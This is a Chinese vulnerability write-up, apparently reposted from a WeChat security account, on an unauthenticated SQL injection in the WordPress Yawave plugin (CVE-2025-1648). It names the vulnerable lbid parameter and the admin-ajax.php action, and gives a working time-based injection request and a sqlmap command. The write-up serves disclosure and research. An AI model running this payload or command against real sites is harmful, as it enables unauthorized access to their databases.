【0day漏洞分析】WordPress Yawave插件存在前台SQL注入漏洞(CVE-2025-1648)

admin 2025年6月7日14:13:40评论0 views字数 770阅读2分34秒阅读模式
 

0x00 前言

该漏洞影响 Yawave 版本 <=2.9.1
如果访问以下路径出现下图所示,说明存在未授权SQL注入漏洞
/wp-admin/admin-ajax.php?action=js_liveblog_update
【0day漏洞分析】WordPress Yawave插件存在前台SQL注入漏洞(CVE-2025-1648)

0x01 漏洞分析&复现

漏洞点在 /includes/shortcode.liveblog.php 的 js_liveblog_update 方法,其通过GET传入 lbid参数,然后直接被带入到SQL查询字句中,导致漏洞产生.  
$get_liveblog_id = sanitize_text_field($_GET['lbid']);
【0day漏洞分析】WordPress Yawave插件存在前台SQL注入漏洞(CVE-2025-1648)
而 js_liveblog_update 方法则被注册进了 wp_ajax 钩子中,所以直接使用 /wp-admin/admin-ajax.php?action=js_liveblog_update 即可调用该方法实施注入.
Payload:
GET /wp-admin/admin-ajax.php?action=js_liveblog_update&lbid=(SELECT%205845%20FROM%20(SELECT(SLEEP(5)))FdfP)
Cache-Control: no-cache
Host: 127.0.0.1
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
Sqlmap 语句:
python sqlmap.py -u "http://127.0.0.1/wp-admin/admin-ajax.php?action=js_liveblog_update&lbid=*" --level=3 --dbms=mysql
【0day漏洞分析】WordPress Yawave插件存在前台SQL注入漏洞(CVE-2025-1648)

 

原文始发于微信公众号(星悦安全):【0day漏洞分析】WordPress Yawave插件存在前台SQL注入漏洞(CVE-2025-1648)

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年6月7日14:13:40
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【0day漏洞分析】WordPress Yawave插件存在前台SQL注入漏洞(CVE-2025-1648)https://cn-sec.com/archives/3779176.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息